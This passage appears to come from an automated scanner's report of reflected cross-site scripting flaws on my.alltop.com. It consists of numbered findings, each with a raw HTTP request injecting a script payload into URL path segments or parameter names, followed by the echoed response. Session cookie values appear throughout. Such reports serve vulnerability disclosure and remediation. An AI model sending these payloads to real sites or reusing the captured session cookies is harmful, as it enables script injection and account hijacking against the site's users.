Cookie: alltop_v=715bc9136ec18fde687f237cb61a1ab8; EPClientLogin=7ec7288512668ca75b58f5b1befbab70; myAlltopSession=slsset6bn1ifrsqdg7nm8hsl12; alltop_r=ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_68540_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Date: Tue, 08 Mar 2011 20:50:32 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.17
Set-Cookie: EPClientLogin=7ec7288512668ca75b58f5b1befbab70; expires=Wed, 07-Mar-2012 20:50:32 GMT; path=/; domain=.alltop.com
Set-Cookie: myAlltopSession=slsset6bn1ifrsqdg7nm8hsl12; path=/; domain=.alltop.com
Expires: Tue, 08 Mar 2011 21:50:32 GMT
Cache-Control: private, max-age=10800, pre-check=10800
Last-Modified: Tue, 26 Oct 2010 18:16:32 GMT
Set-Cookie: alltop_r=ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_68540_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID; expires=Mon, 06-Jun-2011 20:50:32 GMT; path=/; domain=.alltop.com
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 24746

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<h
...[SNIP]...
<form action="/alpha/c'%22--%3E%3C/style%3E%3Ceb328"><script>alert(1)</script>6edab67d23c/script%3E%3Cscript%3Enetsparker(0x000179)%3C/script%3E" method="post" accept-charset="utf-8">
...[SNIP]...

1.63. http://my.alltop.com/alpha/c'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x000179)%3C/script%3E [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://my.alltop.com
Path:   /alpha/c'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x000179)%3C/script%3E

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload aacc1"><script>alert(1)</script>7c61bfbb01f was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /alpha/c'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x000179)%3Caacc1"><script>alert(1)</script>7c61bfbb01f/script%3E HTTP/1.1
Referer: http://my.alltop.com/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations)
Cache-Control: no-cache
Host: my.alltop.com
Cookie: alltop_v=715bc9136ec18fde687f237cb61a1ab8; EPClientLogin=7ec7288512668ca75b58f5b1befbab70; myAlltopSession=slsset6bn1ifrsqdg7nm8hsl12; alltop_r=ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_68540_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Date: Tue, 08 Mar 2011 20:50:35 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.17
Set-Cookie: EPClientLogin=7ec7288512668ca75b58f5b1befbab70; expires=Wed, 07-Mar-2012 20:50:35 GMT; path=/; domain=.alltop.com
Set-Cookie: myAlltopSession=slsset6bn1ifrsqdg7nm8hsl12; path=/; domain=.alltop.com
Expires: Tue, 08 Mar 2011 21:50:37 GMT
Cache-Control: private, max-age=10800, pre-check=10800
Last-Modified: Tue, 26 Oct 2010 18:16:32 GMT
Set-Cookie: alltop_r=ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_68540_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID; expires=Mon, 06-Jun-2011 20:50:37 GMT; path=/; domain=.alltop.com
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 24746

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<h
...[SNIP]...
<form action="/alpha/c'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x000179)%3Caacc1"><script>alert(1)</script>7c61bfbb01f/script%3E" method="post" accept-charset="utf-8">
...[SNIP]...

1.64. http://my.alltop.com/alpha/c'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x000179)%3C/script%3E [REST URL parameter 5]

Summary

Severity:   High
Confidence:   Certain
Host:   http://my.alltop.com
Path:   /alpha/c'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x000179)%3C/script%3E

Issue detail

The value of REST URL parameter 5 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a83c1"><script>alert(1)</script>398cd5a4c2a was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /alpha/c'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x000179)%3C/script%3Ea83c1"><script>alert(1)</script>398cd5a4c2a HTTP/1.1
Referer: http://my.alltop.com/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations)
Cache-Control: no-cache
Host: my.alltop.com
Cookie: alltop_v=715bc9136ec18fde687f237cb61a1ab8; EPClientLogin=7ec7288512668ca75b58f5b1befbab70; myAlltopSession=slsset6bn1ifrsqdg7nm8hsl12; alltop_r=ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_68540_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Date: Tue, 08 Mar 2011 20:50:39 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.17
Set-Cookie: EPClientLogin=7ec7288512668ca75b58f5b1befbab70; expires=Wed, 07-Mar-2012 20:50:39 GMT; path=/; domain=.alltop.com
Set-Cookie: myAlltopSession=slsset6bn1ifrsqdg7nm8hsl12; path=/; domain=.alltop.com
Expires: Tue, 08 Mar 2011 21:50:39 GMT
Cache-Control: private, max-age=10800, pre-check=10800
Last-Modified: Tue, 26 Oct 2010 18:16:32 GMT
Set-Cookie: alltop_r=ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_68540_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID; expires=Mon, 06-Jun-2011 20:50:39 GMT; path=/; domain=.alltop.com
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 24746

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<h
...[SNIP]...
<form action="/alpha/c'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x000179)%3C/script%3Ea83c1"><script>alert(1)</script>398cd5a4c2a" method="post" accept-charset="utf-8">
...[SNIP]...

1.65. http://my.alltop.com/alpha/c'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x000179)%3C/script%3E [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://my.alltop.com
Path:   /alpha/c'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x000179)%3C/script%3E

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 51512"><script>alert(1)</script>db3a9d45e2d was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /alpha/c'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x000179)%3C/script%3E?51512"><script>alert(1)</script>db3a9d45e2d=1 HTTP/1.1
Referer: http://my.alltop.com/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations)
Cache-Control: no-cache
Host: my.alltop.com
Cookie: alltop_v=715bc9136ec18fde687f237cb61a1ab8; EPClientLogin=7ec7288512668ca75b58f5b1befbab70; myAlltopSession=slsset6bn1ifrsqdg7nm8hsl12; alltop_r=ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_68540_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Date: Tue, 08 Mar 2011 20:50:24 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.17
Set-Cookie: EPClientLogin=7ec7288512668ca75b58f5b1befbab70; expires=Wed, 07-Mar-2012 20:50:24 GMT; path=/; domain=.alltop.com
Set-Cookie: myAlltopSession=slsset6bn1ifrsqdg7nm8hsl12; path=/; domain=.alltop.com
Expires: Tue, 08 Mar 2011 21:50:25 GMT
Cache-Control: private, max-age=10800, pre-check=10800
Last-Modified: Tue, 26 Oct 2010 18:16:32 GMT
Set-Cookie: alltop_r=ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_68540_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID; expires=Mon, 06-Jun-2011 20:50:25 GMT; path=/; domain=.alltop.com
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 24758

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<h
...[SNIP]...
<form action="/alpha/c'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x000179)%3C/script%3E?51512"><script>alert(1)</script>db3a9d45e2d=1" method="post" accept-charset="utf-8">
...[SNIP]...

1.66. http://my.alltop.com/alpha/c/%22ns=%22netsparker(0x00017F) [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://my.alltop.com
Path:   /alpha/c/%22ns=%22netsparker(0x00017F)

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7f100"><script>alert(1)</script>a1806507e17 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /alpha/c7f100"><script>alert(1)</script>a1806507e17/%22ns=%22netsparker(0x00017F) HTTP/1.1
Referer: http://my.alltop.com/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations)
Cache-Control: no-cache
Host: my.alltop.com
Cookie: alltop_v=715bc9136ec18fde687f237cb61a1ab8; EPClientLogin=7ec7288512668ca75b58f5b1befbab70; myAlltopSession=slsset6bn1ifrsqdg7nm8hsl12; alltop_r=ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_68540_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Date: Tue, 08 Mar 2011 20:50:22 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.17
Set-Cookie: EPClientLogin=7ec7288512668ca75b58f5b1befbab70; expires=Wed, 07-Mar-2012 20:50:22 GMT; path=/; domain=.alltop.com
Set-Cookie: myAlltopSession=slsset6bn1ifrsqdg7nm8hsl12; path=/; domain=.alltop.com
Expires: Tue, 08 Mar 2011 21:50:23 GMT
Cache-Control: private, max-age=10800, pre-check=10800
Last-Modified: Tue, 26 Oct 2010 18:16:32 GMT
Set-Cookie: alltop_r=ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_68540_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID; expires=Mon, 06-Jun-2011 20:50:23 GMT; path=/; domain=.alltop.com
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 24550

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<h
...[SNIP]...
<form action="/alpha/c7f100"><script>alert(1)</script>a1806507e17/%22ns=%22netsparker(0x00017F)" method="post" accept-charset="utf-8">
...[SNIP]...

1.67. http://my.alltop.com/alpha/c/%22ns=%22netsparker(0x00017F) [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://my.alltop.com
Path:   /alpha/c/%22ns=%22netsparker(0x00017F)

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 768ae"><script>alert(1)</script>785a501ff5d was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /alpha/c/%22ns768ae"><script>alert(1)</script>785a501ff5d=%22netsparker(0x00017F) HTTP/1.1
Referer: http://my.alltop.com/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations)
Cache-Control: no-cache
Host: my.alltop.com
Cookie: alltop_v=715bc9136ec18fde687f237cb61a1ab8; EPClientLogin=7ec7288512668ca75b58f5b1befbab70; myAlltopSession=slsset6bn1ifrsqdg7nm8hsl12; alltop_r=ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_68540_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Date: Tue, 08 Mar 2011 20:50:24 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.17
Set-Cookie: EPClientLogin=7ec7288512668ca75b58f5b1befbab70; expires=Wed, 07-Mar-2012 20:50:24 GMT; path=/; domain=.alltop.com
Set-Cookie: myAlltopSession=slsset6bn1ifrsqdg7nm8hsl12; path=/; domain=.alltop.com
Expires: Tue, 08 Mar 2011 21:50:24 GMT
Cache-Control: private, max-age=10800, pre-check=10800
Last-Modified: Tue, 26 Oct 2010 18:16:32 GMT
Set-Cookie: alltop_r=ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_68540_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID; expires=Mon, 06-Jun-2011 20:50:24 GMT; path=/; domain=.alltop.com
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 24550

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<h
...[SNIP]...
<form action="/alpha/c/%22ns768ae"><script>alert(1)</script>785a501ff5d=%22netsparker(0x00017F)" method="post" accept-charset="utf-8">
...[SNIP]...

1.68. http://my.alltop.com/alpha/c/%22ns=%22netsparker(0x00017F) [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://my.alltop.com
Path:   /alpha/c/%22ns=%22netsparker(0x00017F)

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a7fe2"><script>alert(1)</script>ebeac01edfd was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /alpha/c/%22ns=%22netsparker(0x00017F)?a7fe2"><script>alert(1)</script>ebeac01edfd=1 HTTP/1.1
Referer: http://my.alltop.com/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations)
Cache-Control: no-cache
Host: my.alltop.com
Cookie: alltop_v=715bc9136ec18fde687f237cb61a1ab8; EPClientLogin=7ec7288512668ca75b58f5b1befbab70; myAlltopSession=slsset6bn1ifrsqdg7nm8hsl12; alltop_r=ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_68540_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Date: Tue, 08 Mar 2011 20:50:21 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.17
Set-Cookie: EPClientLogin=7ec7288512668ca75b58f5b1befbab70; expires=Wed, 07-Mar-2012 20:50:21 GMT; path=/; domain=.alltop.com
Set-Cookie: myAlltopSession=slsset6bn1ifrsqdg7nm8hsl12; path=/; domain=.alltop.com
Expires: Tue, 08 Mar 2011 21:50:21 GMT
Cache-Control: private, max-age=10800, pre-check=10800
Last-Modified: Tue, 26 Oct 2010 18:16:32 GMT
Set-Cookie: alltop_r=ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_68540_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID; expires=Mon, 06-Jun-2011 20:50:21 GMT; path=/; domain=.alltop.com
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 24562

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<h
...[SNIP]...
<form action="/alpha/c/%22ns=%22netsparker(0x00017F)?a7fe2"><script>alert(1)</script>ebeac01edfd=1" method="post" accept-charset="utf-8">
...[SNIP]...

1.69. http://my.alltop.com/alpha/c/%2522ns%253D%2522netsparker%25280x000184%2529) [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://my.alltop.com
Path:   /alpha/c/%2522ns%253D%2522netsparker%25280x000184%2529)

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e5dd9"><script>alert(1)</script>f2db9325532 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /alpha/ce5dd9"><script>alert(1)</script>f2db9325532/%2522ns%253D%2522netsparker%25280x000184%2529) HTTP/1.1
Referer: http://my.alltop.com/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations)
Cache-Control: no-cache
Host: my.alltop.com
Cookie: alltop_v=715bc9136ec18fde687f237cb61a1ab8; EPClientLogin=7ec7288512668ca75b58f5b1befbab70; myAlltopSession=slsset6bn1ifrsqdg7nm8hsl12; alltop_r=ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_68540_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Date: Tue, 08 Mar 2011 20:50:32 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.17
Set-Cookie: EPClientLogin=7ec7288512668ca75b58f5b1befbab70; expires=Wed, 07-Mar-2012 20:50:32 GMT; path=/; domain=.alltop.com
Set-Cookie: myAlltopSession=slsset6bn1ifrsqdg7nm8hsl12; path=/; domain=.alltop.com
Expires: Tue, 08 Mar 2011 21:50:33 GMT
Cache-Control: private, max-age=10800, pre-check=10800
Last-Modified: Tue, 26 Oct 2010 18:16:32 GMT
Set-Cookie: alltop_r=ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_68540_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID; expires=Mon, 06-Jun-2011 20:50:33 GMT; path=/; domain=.alltop.com
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 24618

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<h
...[SNIP]...
<form action="/alpha/ce5dd9"><script>alert(1)</script>f2db9325532/%2522ns%253D%2522netsparker%25280x000184%2529)" method="post" accept-charset="utf-8">
...[SNIP]...

1.70. http://my.alltop.com/alpha/c/%2522ns%253D%2522netsparker%25280x000184%2529) [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://my.alltop.com
Path:   /alpha/c/%2522ns%253D%2522netsparker%25280x000184%2529)

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b4f0a"><script>alert(1)</script>ed05747b51 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /alpha/c/%2522ns%253D%2522netsparker%25280x000184%2529)b4f0a"><script>alert(1)</script>ed05747b51 HTTP/1.1
Referer: http://my.alltop.com/
